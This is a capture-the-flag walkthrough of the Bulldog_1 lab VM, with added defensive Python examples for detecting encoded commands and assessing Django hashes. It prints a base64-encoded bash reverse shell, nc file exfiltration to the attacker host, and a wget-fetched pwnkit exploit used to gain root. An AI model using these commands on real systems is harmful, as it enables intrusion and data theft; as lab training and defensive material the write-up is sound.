Bulldog_1 VM

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.123
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 23:49 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
8080/tcp open http-proxy
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.123
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-03 02:26 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00032s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

Ports 23, 80 and 8080 are open; the UDP port scan shows nothing that needs special attention.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p23,80,8080 192.168.56.123
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 23:49 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00035s latency).

PORT STATE SERVICE VERSION
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.33 seconds

From this we can tell that port 23 is actually an SSH port, and ports 80 and 8080 seem to have the same page title and the same server stack.

┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ sudo nmap --script=vuln -p23,80,8080 192.168.56.123
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-03 01:41 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00035s latency).

PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-enum:
| /robots.txt: Robots file
|_ /dev/: Potentially interesting folder
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /robots.txt: Robots file
|_ /dev/: Potentially interesting folder
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)

The enumeration results for ports 80 and 8080 are identical as well.

Looking at the website

Next, look only at port 80 for now and inspect the web page.

On the port 80 page, the site owner explains one thing: they were attacked, and a link to a public statement is given.

The statement leaks some information: the hacker got in through a shell and then used the Dirty COW vulnerability to escalate privileges, and there is a username, Churchy. nmap enumerated some directories and files earlier, so look at those, and at the same time start a dirsearch directory brute-force.

┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ sudo dirsearch -u http://192.168.56.123
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.123/_23-07-03_01-45-30.txt

Error Log: /root/.dirsearch/logs/errors-23-07-03_01-45-30.log

Target: http://192.168.56.123/

[01:45:30] Starting:
[01:45:37] 301 - 0B - /admin -> http://192.168.56.123/admin/
[01:45:37] 302 - 0B - /admin/ -> http://192.168.56.123/admin/login/?next=/admin/
[01:45:37] 302 - 0B - /admin/?/login -> http://192.168.56.123/admin/login/?next=/admin/%3F/login
[01:45:38] 301 - 0B - /admin/login -> http://192.168.56.123/admin/login/
[01:45:46] 301 - 0B - /dev -> http://192.168.56.123/dev/
[01:45:46] 200 - 3KB - /dev/
[01:45:58] 200 - 1KB - /robots.txt
Task Completed

robots.txt contains the logo of the team the hackers left behind after the breach; what about the dev directory?

It gives more detailed information. To summarise: this seems to be the development team's explanation and training for new employees. PHP has been removed from the server; instead of popular CMSes and management tools they use tools developed in-house. There is a web shell interface that will replace SSH connections in the future, MongoDB has not been set up yet, the company has bought a new intrusion detection system, and a link to the web shell is given.

Clicking it says you are not authenticated. Take a look at the source of the development team page.

The hashes are written right into it; crack them with an online tool.

Two users' passwords came out: sarah:bulldoglover and nick:bulldog. Tried SSH login with them, but it failed.

Actually, at first I only glanced at the collapsed source in the console and didn't view the page source directly, so I got stuck here for a long time. I tried some Django vulnerabilities against the login page below, including the three in CVE-PoC/Django at main · HxDDD/CVE-PoC · GitHub, but none succeeded. So I used Burp Suite's Cluster bomb mode to brute-force it, with the usernames taken from the email addresses on the page just seen and the passwords from Burp Suite's default password list, and got the login credentials nick:bulldog.

Getshell

Back to the directory scan results, which include the login URL.

Tried logging in with the two users above; nick:bulldog logs in successfully, but the interface says there is no permission to edit anything.

So the entry point doesn't seem obvious here. Going back to the /dev directory, there is now a web shell interface.

Encoded Getshell

Tried it out and found there is simple filtering: commands such as whoami and bash are filtered, so base64-encode the command and then execute it.

┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ echo '/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/443 0>&1"' |base64
L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQ0MyAwPiYx
Igo=

┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQ0MyAwPiYxIgo=" | base64 -d
/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/443 0>&1"

Based on the result above, construct:

echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQ0MyAwPiYxIgo=" | base64 -d | bash
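As an added defender-side aside (not part of the original write-up): the web shell's filter failed because it matched blocked words literally, before any decoding. The Python below, written for this page, contrasts that naive check with one that decodes base64 tokens first and also flags decode-and-execute pipelines; the encoded string is the one from the page, while the `| sh` variant and the other test inputs are constructed.

```python
import base64
import binascii
import re

# Words the Bulldog web shell rejected according to the page.
BLOCKED = ("whoami", "bash")
# Candidate base64 tokens: long runs of the base64 alphabet with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# "base64 -d ... | sh" / "| bash": decoded bytes handed straight to an interpreter.
DECODE_EXEC = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")


def naive_filter(cmd: str) -> bool:
    """The deny-list as the page describes it: allow unless a blocked word appears literally."""
    return not any(word in cmd for word in BLOCKED)


def decoded_layers(cmd: str, max_depth: int = 3) -> list:
    """The command plus every base64 token in it decoded, repeated for nested encodings."""
    layers, frontier = [cmd], [cmd]
    for _ in range(max_depth):
        nxt = []
        for text in frontier:
            for token in B64_TOKEN.findall(text):
                try:
                    decoded = base64.b64decode(token, validate=True).decode("utf-8")
                except (binascii.Error, UnicodeDecodeError):
                    continue          # not really base64, or not text
                if decoded.strip().isprintable():
                    nxt.append(decoded)
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def inspect_command(cmd: str) -> dict:
    """Match the deny-list against every decoded layer and flag decode-and-execute pipelines."""
    layers = decoded_layers(cmd)
    hits = sorted({w for layer in layers for w in BLOCKED if w in layer})
    pipeline = bool(DECODE_EXEC.search(cmd))
    return {
        "passes_naive_filter": naive_filter(cmd),
        "blocked_words_after_decoding": hits,
        "decode_and_execute": pipeline,
        "verdict": "block" if hits or pipeline else "allow",
    }


# The encoded string is the one from the page; piping it into `sh` is a constructed variant.
PAGE_B64 = "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQ0MyAwPiYxIgo="
SAMPLES = ["whoami", f'echo "{PAGE_B64}" | base64 -d | sh', "ls -la /tmp"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_command(sample))
```

Note that the page's own final command pipes into bash in the clear, so the real filter was evidently looser still than a substring match; a deny-list is a stopgap either way, and the durable fix is not to expose a command-execution endpoint at all.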

Start the listener in advance, then execute it in the web page.

The reverse shell comes back successfully.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.123] 48748
bash: cannot set terminal process group (976): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$whoami
whoami
django
django@bulldog:/home/django/bulldog$ id
id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
django@bulldog:/home/django/bulldog$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe07:ae20/64 scope link
valid_lft forever preferred_lft forever
django@bulldog:/home/django/bulldog$ uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Confirmed the reverse shell works, and learned the kernel version; next, upgrade the shell.

django@bulldog:/home/django/bulldog$ python -c "import pty;pty.spawn('/bin/bash')"
</bulldog$ python -c "import pty;pty.spawn('/bin/bash')"
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$ export TERM=xterm
export TERM=xterm

Privilege escalation

Information gathering

First, look at what is in the current directory.

django@bulldog:/home/django/bulldog$ ls
ls
bulldog db.sqlite3 manage.py
django@bulldog:/home/django/bulldog$ cat manage.py
cat manage.py
#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bulldog.settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)

There is a db.sqlite3 file; send it to the attacking machine with nc: the attacking machine runs sudo nc -lv -p 333 > db.sqlite3, and the target runs nc -nv 192.168.56.106 333 < db.sqlite3 to send the file.

django@bulldog:/home/django/bulldog$ nc -nv 192.168.56.106 333 < db.sqlite3
nc -nv 192.168.56.106 333 < db.sqlite3
Connection to 192.168.56.106 333 port [tcp/*] succeeded!

Viewing the sqlite3 database file

I looked up how to view a sqlite3 database file:

  • sqlite3 <filename> opens the file
  • .tables lists all tables
  • .schema shows the table structure
  • select * from <table>;
    ┌──(kali㉿kali)-[~/Downloads/bulldog]
    └─$ sqlite3 db.sqlite3
    SQLite version 3.40.1 2022-12-28 14:03:47
    Enter ".help" for usage hints.
    sqlite>.tables
    auth_group auth_user_user_permissions
    auth_group_permissions django_admin_log
    auth_permission django_content_type
    auth_user django_migrations
    auth_user_groups django_session
    sqlite> select * from auth_user;
    1|pbkdf2_sha256$20000$9k0TYJltYWk5$rE0aQA4DGFxEjBhBH0BEJhFsF2Jx63690a8VGE/9a+c=|1|admin|||admin@bulldogindustries.com|1|1|2017-08-18 22:42:27.888865|2017-08-19 06:14:22.419010
    3|pbkdf2_sha256$20000$AvMG3SPMFdWk$br74kiJcinPLKkqG+i9G+2MavMVW9IXDl2TSeQ5My+A=|0|alan||||1|1|2017-08-19 05:57:32|
    4|pbkdf2_sha256$20000$LgCCwZ1qFhSK$xv2NHkto76GEp11lXNUFPsiolvoV8c8R/PRl2/XccX0=|0|william||||1|1|2017-08-19 06:02:07|
    5|pbkdf2_sha256$20000$IjvfpwWo8tw9$9PZgYsZCcRz3dLVU/4TnXa9i2VcybBnBedCyNjk3Sak=|0|malik||||1|1|2017-08-19 06:02:50|
    6|pbkdf2_sha256$20000$ooicdWHyxlTk$oNMBAZDKarihoPIzzYAhDq+4cR8JtJGt9JQIA8q1SX8=|0|kevin||||1|1|2017-08-19 06:03:22|
    7|pbkdf2_sha256$20000$nmdkvhu3yqa9$8VSo44h9fXYj6FLavolYDZ7P5PhFBLeKBmLkBlNpGTk=|0|ashley||||1|1|2017-08-19 06:04:18|
    8|pbkdf2_sha256$20000$QFeEaqreqK8o$ldGl5qhFnyB+tFrOflSwxSGO3Xt/mL4sjBiCPyPusU4=|0|nick||||1|1|2017-08-19 06:06:08|2023-07-03 07:32:15.318467
    9|pbkdf2_sha256$20000$lA6iOt4XGXLw$0VHpbYjNiFN4CnHisuB+bFh72A6sn03Q+d34Laj7jkM=|0|sarah||||1|1|2017-08-19 06:06:56|
    sqlite> select * from auth_permission;
    1|1|add_logentry|Can add log entry
    2|1|change_logentry|Can change log entry
    3|1|delete_logentry|Can delete log entry
    4|2|add_permission|Can add permission
    5|2|change_permission|Can change permission
    6|2|delete_permission|Can delete permission
    7|3|add_group|Can add group
    8|3|change_group|Can change group
    9|3|delete_group|Can delete group
    10|4|add_user|Can add user
    11|4|change_user|Can change user
    12|4|delete_user|Can delete user
    13|5|add_contenttype|Can add content type
    14|5|change_contenttype|Can change content type
    15|5|delete_contenttype|Can delete content type
    16|6|add_session|Can add session
    17|6|change_session|Can change session
    18|6|delete_session|Can delete session
    sqlite> select * from django_admin_log;
    1|2017-08-18 22:44:28.935362|2|alan|1||4|1
    2|2017-08-19 05:52:32.978087|2|alan|3||4|1
    3|2017-08-19 05:57:32.723768|3|alan|1||4|1
    4|2017-08-19 06:02:07.988633|4|william|1||4|1
    5|2017-08-19 06:02:50.604910|5|malik|1||4|1
    6|2017-08-19 06:03:22.814721|6|kevin|1||4|1
    7|2017-08-19 06:04:18.210702|7|ashley|1||4|1
    8|2017-08-19 06:06:08.629082|8|nick|1||4|1
    9|2017-08-19 06:06:56.356511|9|sarah|1||4|1
    10|2017-08-19 06:13:55.722525|8|nick|2|Changed password.|4|1
    11|2017-08-19 06:14:50.804394|3|alan|2|Changed is_staff.|4|1
    12|2017-08-19 06:14:57.811418|7|ashley|2|Changed is_staff.|4|1
    13|2017-08-19 06:15:08.187751|6|kevin|2|Changed is_staff.|4|1
    14|2017-08-19 06:15:18.199899|5|malik|2|Changed is_staff.|4|1
    15|2017-08-19 06:15:25.607889|8|nick|2|Changed is_staff.|4|1
    16|2017-08-19 06:15:32.692866|9|sarah|2|Changed is_staff.|4|1
    17|2017-08-19 06:15:42.247879|4|william|2|Changed is_staff.|4|1

Looking through it, the passwords are hashed with pbkdf2_sha256, which is hard to crack, so this only yields some usernames. Back in the shell, continue gathering information: in a subdirectory of the current directory there is a settings.py file containing a secret_key, but after searching around it doesn't seem usable for privilege escalation.
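An added example (not from the original post) of what the dump actually tells a defender: it parses the pipe-delimited auth_user rows, decodes Django's pbkdf2_sha256$iterations$salt$digest format, verifies a constructed credential the way Django does, and flags the 20000-iteration count (Django 1.8's default) as weak against a threshold of 100000 that is my own choice. The column order is inferred from the rows above, nick's row is copied from the dump, and the demo password and salt are constructed.

```python
import base64
import hashlib
import hmac

# Column order as it appears in the page's `select * from auth_user` rows (inferred from the data).
AUTH_USER_COLUMNS = ("id", "password", "is_superuser", "username", "first_name",
                     "last_name", "email", "is_staff", "is_active", "date_joined", "last_login")


def parse_auth_user_row(row: str) -> dict:
    """Split one pipe-delimited sqlite3 output row into named columns."""
    fields = row.split("|")
    if len(fields) != len(AUTH_USER_COLUMNS):
        raise ValueError(f"expected {len(AUTH_USER_COLUMNS)} columns, got {len(fields)}")
    return dict(zip(AUTH_USER_COLUMNS, fields))


def parse_django_hash(encoded: str) -> dict:
    """Django stores passwords as <algorithm>$<iterations>$<salt>$<base64 digest>."""
    algorithm, iterations, salt, digest = encoded.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError(f"unsupported hasher: {algorithm}")
    return {"algorithm": algorithm, "iterations": int(iterations), "salt": salt, "digest": digest}


def make_django_hash(password: str, salt: str, iterations: int) -> str:
    """Reproduce Django's PBKDF2-HMAC-SHA256 encoding for a given salt and iteration count."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt.encode("ascii"), iterations)
    return f"pbkdf2_sha256${iterations}${salt}${base64.b64encode(dk).decode('ascii')}"


def check_password(password: str, encoded: str) -> bool:
    """Constant-time comparison, the way Django's hasher verifies a login."""
    parts = parse_django_hash(encoded)
    candidate = make_django_hash(password, parts["salt"], parts["iterations"])
    return hmac.compare_digest(candidate.encode("ascii"), encoded.encode("ascii"))


def assess_row(row: str, minimum_iterations: int = 100_000) -> dict:
    """What a defender reads off a dumped row: who, how the hash was made, whether it is weak."""
    user = parse_auth_user_row(row)
    parts = parse_django_hash(user["password"])
    return {
        "username": user["username"],
        "is_superuser": user["is_superuser"] == "1",
        "iterations": parts["iterations"],
        "below_minimum": parts["iterations"] < minimum_iterations,  # threshold is my own choice
    }


# Row for nick, copied from the dump on the page.
NICK_ROW = ("8|pbkdf2_sha256$20000$QFeEaqreqK8o$ldGl5qhFnyB+tFrOflSwxSGO3Xt/mL4sjBiCPyPusU4=|0|nick||||1|1|"
            "2017-08-19 06:06:08|2023-07-03 07:32:15.318467")

# Constructed credential (not from the page) to show verification end to end.
DEMO_SALT = "Ab3xYz9qLm2P"
DEMO_HASH = make_django_hash("correct horse", DEMO_SALT, 20000)

if __name__ == "__main__":
    print(assess_row(NICK_ROW))
    print(check_password("correct horse", DEMO_HASH), check_password("wrong", DEMO_HASH))
```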

django@bulldog:/home/django/bulldog/bulldog$ cat settings.py
"""
Django settings for bulldog project.

Generated by 'django-admin startproject' using Django 1.8.7.

For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os

BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%9a3ph3iwk$v*_#x4ejg8(t5(qll0fl8q8&u+o_g$yi83d*riq'

Cron jobs and SUID

Check the cron jobs.

django@bulldog:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Check files with the setuid (s) bit.

django@bulldog:/home/django$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
407927 44 -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
278771 40 -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
280147 16 -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
279434 420 -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
262725 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
280225 204 -rwsr-xr-x 1 root root 208680 Apr 29 2017 /usr/lib/snapd/snap-confine
262540 56 -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
280156 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
262529 40 -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
279685 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
262624 136 -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
278786 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
262404 40 -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
278787 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
262465 76 -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
262402 52 -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
131149 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
131135 40 -rwsr-xr-x 1 root root 40152 Jun 14 2017 /bin/mount
131184 28 -rwsr-xr-x 1 root root 27608 Jun 14 2017 /bin/umount
131166 40 -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
131150 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
133809 32 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
133812 140 -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g

There are polkit-agent-helper-1 and pkexec, so CVE-2021-4034 should be usable, but still try step by step whether there are other attack paths. /bin/ntfs-3g is one I'm seeing for the first time; a search shows there is indeed a script: ntfs-3g (Debian 9) - Local Privilege Escalation - Linux local Exploit (exploit-db.com)

Tried running it, but it did not succeed; the error messages are as follows.

[-] FAILED: your need make / build tools
./41240.sh: line 61: /tmp/r00t: No such file or directory
./41240.sh: line 62: /tmp/r00t: No such file or directory

Looking at the source, the exploit apparently did not succeed: the bash file was not copied to tmp, so the file could not be found at the end.

Looking for hidden files

Look at writable files.

django@bulldog:/home/django$ find / -type f -writable -not -path "/proc/*" -not -path "/home/*" -not -path "/sys*" 2>/dev/null
< -not -path "/proc/*" -not -path "/home/*" -not -path "/sys*" 2>/dev/null
/.hiddenAVDirectory/AVApplication.py

There is a writable script file under the root directory; look at its details.

django@bulldog:/home/django$ ls -liah /.hiddenAVDirectory/AVApplication.py
ls -liah /.hiddenAVDirectory/AVApplication.py
141860 -rwxrwxrwx 1 root root 157 Aug 26 2017 /.hiddenAVDirectory/AVApplication.py
django@bulldog:/home/django$ cd /.hiddenAVDirectory
cd /.hiddenAVDirectory
django@bulldog:/.hiddenAVDirectory$ ls -liah
ls -liah
total 12K
131483 drwxr-xr-x 2 root root 4.0K Aug 26 2017 .
2 drwxr-xr-x 24 root root 4.0K Aug 26 2017 ..
141860 -rwxrwxrwx 1 root root 157 Aug 26 2017 AVApplication.py

This should be the intrusion detection program mentioned earlier, although it is rather crude, and its permissions are 777. It feels like it could be a breakthrough point, but without finding what invokes it that doesn't help; I dug through ps aux and netstat -a and found nothing exploitable. At first I thought this file might be the way in and spent a lot of effort ruling it out, wasting quite a bit of time.

Next, go through the folders level by level, starting with the folders under home.

django@bulldog:/home$ ls -liah
ls -liah
total 16K
12 drwxr-xr-x 4 root root 4.0K Aug 24 2017 .
2 drwxr-xr-x 24 root root 4.0K Aug 26 2017 ..
687 drwxr-xr-x 5 bulldogadmin bulldogadmin 4.0K Sep 21 2017 bulldogadmin
131698 drwxr-xr-x 5 django django 4.0K Sep 21 2017 django

Under home there are only two folders, django and bulldogadmin. Enter bulldogadmin and look.

django@bulldog:/home$ cd bulldogadmin
cd bulldogadmin
django@bulldog:/home/bulldogadmin$ ls -liah
ls -liah
total 40K
687 drwxr-xr-x 5 bulldogadmin bulldogadmin 4.0K Sep 21 2017 .
12 drwxr-xr-x 4 root root 4.0K Aug 24 2017 ..
16091 -rw-r--r-- 1 bulldogadmin bulldogadmin 220 Aug 24 2017 .bash_logout
16190 -rw-r--r-- 1 bulldogadmin bulldogadmin 3.7K Aug 24 2017 .bashrc
16850 drwx------ 2 bulldogadmin bulldogadmin 4.0K Aug 24 2017 .cache
141810 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Sep 21 2017 .hiddenadmindirectory
16892 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Aug 25 2017 .nano
16235 -rw-r--r-- 1 bulldogadmin bulldogadmin 655 Aug 24 2017 .profile
16888 -rw-rw-r-- 1 bulldogadmin bulldogadmin 66 Aug 25 2017 .selected_editor
16854 -rw-r--r-- 1 bulldogadmin bulldogadmin 0 Aug 24 2017 .sudo_as_admin_successful
16232 -rw-rw-r-- 1 bulldogadmin bulldogadmin 217 Aug 24 2017 .wget-hsts
django@bulldog:/home/bulldogadmin$ cd .hiddenadmindirectory
cd .hiddenadmindirectory
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -liah
ls -liah
total 24K
141810 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Sep 21 2017 .
687 drwxr-xr-x 5 bulldogadmin bulldogadmin 4.0K Sep 21 2017 ..
141862 -rw-r--r-- 1 bulldogadmin bulldogadmin 8.6K Aug 26 2017 customPermissionApp
141866 -rw-rw-r-- 1 bulldogadmin bulldogadmin 619 Sep 21 2017 note
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ cat note
cat note
Nick,

I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!

It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?

Let me know what you think of it!

-Ashley

There is a note; roughly, a new backend permission tool has been developed, and entering the account password gets you permission on the file. I tried downloading the file to the attacking machine and then uploading it to the target's tmp directory, and it does indeed prompt for a password. Viewing customPermissionApp with cat shows lots of garbled output, so use the strings command instead.

┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ strings customPermissionApp
/lib64/ld-linux-x86-64.so.2
32S0-t
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
Usage: ./customPermissionApp <username>
sudo su root

Only part of the output is listed above. It gives the usage of this file: run it with a username. At first I didn't notice that the password is actually hidden in the few lines above.

Privilege escalation with CVE-2021-4034

I used the CVE-2021-4034 mentioned earlier to escalate privileges; the precompiled binary I used can be found here: dzonerzy/poc-cve-2021-4034: PoC for CVE-2021-4034 dubbed pwnkit (github.com)

django@bulldog:/tmp$ wget http://192.168.56.106:8088/exploit
wget http://192.168.56.106:8088/exploit
--2023-07-03 09:30:45-- http://192.168.56.106:8088/exploit
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4442423 (4.2M) [application/octet-stream]
Saving to: ‘exploit’

exploit 100%[===================>] 4.24M --.-KB/s in 0.03s

2023-07-03 09:30:45 (129 MB/s) - ‘exploit’ saved [4442423/4442423]

django@bulldog:/tmp$ chmod +x exploit
chmod +x exploit
django@bulldog:/tmp$ ./exploit
./exploit
2023/07/03 04:30:56 CMDTOEXECUTE is empty fallback to default value
2023/07/03 04:30:56 Executing command sh
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
congrats.txt
# cat congrats.txt
cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?

